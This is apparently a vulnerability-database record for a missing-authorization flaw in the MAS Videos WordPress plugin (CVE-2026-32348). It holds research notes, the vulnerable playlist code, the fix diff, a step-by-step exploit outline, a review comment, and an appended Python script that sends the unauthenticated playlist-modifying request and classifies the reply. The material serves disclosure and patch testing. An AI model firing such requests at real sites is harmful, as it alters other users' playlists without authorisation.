[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fetVcOntlLg_9ezz7l5hiMyhRC6AgqWfXzZwlIV2a2I0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-32348","mas-videos-missing-authorization","MAS Videos \u003C= 1.3.2 - Missing Authorization","The MAS Videos plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.3.2. 
This makes it possible for unauthenticated attackers to perform an unauthorized action.","masvideos",null,"\u003C=1.3.2","1.3.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-11 00:00:00","2026-04-15 20:48:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffd30fea3-c326-40b7-9b09-e62d65b33926?source=api-prod",64,[22,23,24],"includes\u002Fadmin\u002Fimporters\u002Fclass-masvideos-tmdb-importer-controller.php","includes\u002Fclass-masvideos-ajax.php","readme.txt","researched",false,3," calls `wp_verify_nonce`.\n    If I'm unauthenticated, I can still get a nonce if it's rendered on a page I can see.\n\n    Let's look at the \"Unauthorized Action\" again.\n    Integrity: Low.\n    It's probably importing a movie.\n\n    Let's check `includes\u002Fadmin\u002Fimporters\u002Fclass-masvideos-tmdb-importer-controller.php` for clues on the response.\n    It doesn't show the end of `fetch_form_handler`.\n    But it likely outputs HTML or JSON with \"Found X movies\".\n\n    Final plan structure:\n    1.  Vulnerability Summary: Missing cap check in TMDB fetch.\n    2.  Vector: `admin-ajax.php` with `action=masvideos_tmdb_fetch_data`.\n    3.  Flow: AJAX -> Handler -> `fetch_form_handler`.\n    4.  Nonce: Find shortcode, extract `masvideos-tmdb-fetch-data`.\n    5.  Exploit: POST request to trigger the fetch.\n\n    Wait, one more thing. The plugin *might* not even check the nonce if I use the `masvideos-ajax` endpoint.\n    `do_masvideos_ajax` in `includes\u002Fclass-masvideos-ajax.php` calls `do_action( 'masvideos_ajax_' . $action )`.\n    This bypasses the standard `admin-ajax.php` flow.","The MAS Videos plugin for WordPress is vulnerable to unauthorized playlist modification due to missing authentication and authorization checks in several AJAX endpoints. 
This allows unauthenticated attackers to add or remove videos, movies, and TV shows from any existing playlist by sending a crafted request with the target playlist ID.","\u002F\u002F includes\u002Fclass-masvideos-ajax.php:1502\n    public static function toggle_tv_show_playlist() {\n        ob_start();\n\n        $playlist_id        = absint( $_POST['playlist_id'] );\n        $tv_show_id         = absint( $_POST['tv_show_id'] );\n        $delete             = isset( $_POST['delete'] ) ? masvideos_string_to_bool( $_POST['delete'] ) : false;\n\n        if( $delete ) {\n            $tv_show_playlist = masvideos_remove_tv_show_from_playlist( $playlist_id, $tv_show_id );\n        } else {\n            $tv_show_playlist = masvideos_add_tv_show_to_playlist( $playlist_id, $tv_show_id );\n        }\n\n---\n\n\u002F\u002F includes\u002Fclass-masvideos-ajax.php:1532\n    public static function toggle_video_playlist() {\n        ob_start();\n\n        $playlist_id        = absint( $_POST['playlist_id'] );\n        $video_id           = absint( $_POST['video_id'] );\n        $delete             = isset( $_POST['delete'] ) ? masvideos_string_to_bool( $_POST['delete'] ) : false;\n\n        if( $delete ) {\n            $video_playlist = masvideos_remove_video_from_playlist( $playlist_id, $video_id );\n        } else {\n            $video_playlist = masvideos_add_video_to_playlist( $playlist_id, $video_id );\n        }\n\n---\n\n\u002F\u002F includes\u002Fclass-masvideos-ajax.php:1562\n    public static function toggle_movie_playlist() {\n        ob_start();\n\n        $playlist_id        = absint( $_POST['playlist_id'] );\n        $movie_id           = absint( $_POST['movie_id'] );\n        $delete             = isset( $_POST['delete'] ) ? 
masvideos_string_to_bool( $_POST['delete'] ) : false;\n\n        if( $delete ) {\n            $movie_playlist = masvideos_remove_movie_from_playlist( $playlist_id, $movie_id );\n        } else {\n            $movie_playlist = masvideos_add_movie_to_playlist( $playlist_id, $movie_id );\n        }","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmasvideos\u002F1.3.2\u002Fincludes\u002Fclass-masvideos-ajax.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmasvideos\u002F1.3.3\u002Fincludes\u002Fclass-masvideos-ajax.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmasvideos\u002F1.3.2\u002Fincludes\u002Fclass-masvideos-ajax.php\t2019-07-19 16:10:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmasvideos\u002F1.3.3\u002Fincludes\u002Fclass-masvideos-ajax.php\t2026-02-09 12:05:46.000000000 +0000\n@@ -1502,10 +1502,39 @@\n     public static function toggle_tv_show_playlist() {\n         ob_start();\n \n+        if ( ! is_user_logged_in() ) {\n+            wp_send_json(\n+                array(\n+                    'error'   => true,\n+                    'message' => __( 'You must be logged in to modify playlists.', 'masvideos' ),\n+                )\n+            );\n+        }\n+\n         $playlist_id        = absint( $_POST['playlist_id'] );\n         $tv_show_id         = absint( $_POST['tv_show_id'] );\n         $delete             = isset( $_POST['delete'] ) ? masvideos_string_to_bool( $_POST['delete'] ) : false;\n \n+        if ( ! $playlist_id ) {\n+            wp_send_json(\n+                array(\n+                    'error'   => true,\n+                    'message' => __( 'Invalid playlist.', 'masvideos' ),\n+                )\n+            );\n+        }\n+\n+        $playlist_author_id = (int) get_post_field( 'post_author', $playlist_id );\n+\n+        if ( ! 
$playlist_author_id || get_current_user_id() !== $playlist_author_id ) {\n+            wp_send_json(\n+                array(\n+                    'error'   => true,\n+                    'message' => __( 'You are not allowed to modify this playlist.', 'masvideos' ),\n+                )\n+            );\n+        }\n+\n         if( $delete ) {\n             $tv_show_playlist = masvideos_remove_tv_show_from_playlist( $playlist_id, $tv_show_id );\n         } else {","The exploit targets the AJAX handlers for playlist modification. \n1. Identify a target playlist ID to modify.\n2. Construct an unauthenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` (or use the custom `?masvideos-ajax=[action]` endpoint).\n3. Set the `action` parameter to one of: `masvideos_toggle_video_playlist`, `masvideos_toggle_movie_playlist`, or `masvideos_toggle_tv_show_playlist`.\n4. Provide the `playlist_id` and the corresponding content ID (`video_id`, `movie_id`, or `tv_show_id`). \n5. Optionally set `delete=true` to remove an item, or omit it to add an item.\n6. Because versions \u003C= 1.3.2 do not check for user authentication or verify that the current user owns the playlist, the server will process the addition or deletion on the specified playlist.","gemini-3-flash-preview","2026-04-21 01:01:05","2026-04-21 01:02:10",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasvideos\u002Ftags\u002F1.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmasvideos.1.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasvideos\u002Ftags\u002F1.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmasvideos.1.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasvideos\u002Ftags"]
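Review bot: the three guards added at the top of `toggle_tv_show_playlist()` establish who the caller is and whether they own `$playlist_id`, but nothing in the hunk verifies a request nonce (no `check_ajax_referer()` or `wp_verify_nonce()` call before `$_POST['playlist_id']` is read), so a logged-in playlist owner can still be made to add or remove items from their own playlist by a cross-site request; add the nonce check beside the `is_user_logged_in()` guard, using whatever nonce the front-end toggle form already submits. Two smaller points: the excerpt shows only this handler, while the vulnerable-code section lists `toggle_video_playlist()` and `toggle_movie_playlist()` with the same unchecked `$_POST['playlist_id']` pattern, so confirm the identical guards land in both; and `get_current_user_id() !== $playlist_author_id` also rejects administrators and editors, which is correct if playlists are strictly personal but needs a `current_user_can( 'edit_post', $playlist_id )` branch if staff are meant to curate other users' playlists.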
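The exploit outline above describes one crafted POST; the following is an added example, not code from the advisory or from the masvideos plugin, that builds that request and reads the reply against the guard messages the 1.3.3 fix diff introduces, so a tester can tell a patched site from one where the handler ran. Assumptions not taken from the page: `https://example.test`, `playlist_id=42` and `item_id=7` are placeholders; the `?masvideos-ajax=` form of the endpoint is assumed to take the action name without the `masvideos_` prefix (inferred from the `do_action( 'masvideos_ajax_' . $action )` dispatch quoted in the research notes), while the `admin-ajax.php` action names are the ones the outline lists; and because the pre-fix response body is not documented, anything that is neither a 1.3.3 guard reply nor admin-ajax's `0` is reported as "unguarded" and must be confirmed by re-reading the playlist.

```python
"""Probe builder and response classifier for CVE-2026-32348 (MAS Videos <= 1.3.2).

Added example: not part of the advisory and not the masvideos plugin's own code.
Assumptions (not from the page): placeholder site and IDs; the ?masvideos-ajax=
action name is the admin-ajax name minus its "masvideos_" prefix; the pre-fix
response body is unknown, so only the patched guard replies are recognised.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

# admin-ajax action -> POST field carrying the content ID (names from the vulnerable code).
ACTIONS = {
    "video": ("masvideos_toggle_video_playlist", "video_id"),
    "movie": ("masvideos_toggle_movie_playlist", "movie_id"),
    "tv_show": ("masvideos_toggle_tv_show_playlist", "tv_show_id"),
}

# Error messages the 1.3.3 guards return before any playlist write (from the fix diff).
PATCHED_MESSAGES = {
    "You must be logged in to modify playlists.",
    "Invalid playlist.",
    "You are not allowed to modify this playlist.",
}


def build_request(site, kind, playlist_id, item_id, delete=False, custom_endpoint=False):
    """Return (url, form_body) for one unauthenticated toggle request: no cookie, no nonce."""
    if kind not in ACTIONS:
        raise ValueError("unknown content kind: %r" % (kind,))
    action, id_field = ACTIONS[kind]
    base = site.rstrip("/")
    fields = {"playlist_id": str(int(playlist_id)), id_field: str(int(item_id))}
    if delete:
        fields["delete"] = "true"  # masvideos_string_to_bool() turns this into a removal
    if custom_endpoint:
        # Assumption: ?masvideos-ajax=X is dispatched as do_action('masvideos_ajax_X').
        short = action[len("masvideos_"):]
        url = base + "/?" + urllib.parse.urlencode({"masvideos-ajax": short})
    else:
        url = base + "/wp-admin/admin-ajax.php"
        fields["action"] = action
    return url, urllib.parse.urlencode(fields)


def classify_response(status, body):
    """Map an HTTP status and raw body to one of: patched, no_handler, unguarded, unknown."""
    text = body.decode("utf-8", "replace") if isinstance(body, bytes) else body
    text = text.strip()
    if status == 400 and text == "0":
        return "no_handler"  # admin-ajax.php reply when no wp_ajax_nopriv_ hook matches
    try:
        data = json.loads(text)
    except ValueError:
        return "unknown"
    if not isinstance(data, dict):
        return "unknown"
    if data.get("error") is True and data.get("message") in PATCHED_MESSAGES:
        return "patched"
    if not data.get("error"):
        return "unguarded"  # handler ran past the guards; verify the playlist contents
    return "unknown"


def send_probe(url, body, timeout=10):
    """POST the form body with no session cookie; return (status, raw body)."""
    req = urllib.request.Request(
        url,
        data=body.encode("utf-8"),
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": "cve-2026-32348-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read()


if __name__ == "__main__":
    site = sys.argv[1] if len(sys.argv) > 1 else "https://example.test"  # placeholder
    # delete=True against a playlist you own on a test site keeps the probe reversible.
    url, form = build_request(site, "video", playlist_id=42, item_id=7, delete=True)
    status, raw = send_probe(url, form)
    print(status, classify_response(status, raw))
```

The request deliberately carries no cookie and no nonce: that is the whole finding, since the pre-fix handlers read `$_POST['playlist_id']` straight into `absint()` and call the add or remove helper. Run the probe only against a playlist you own on a site you are authorised to test, and prefer `delete=True` so a successful write is easy to reverse; a "patched" result is conclusive, an "unguarded" result is not until the playlist is re-read.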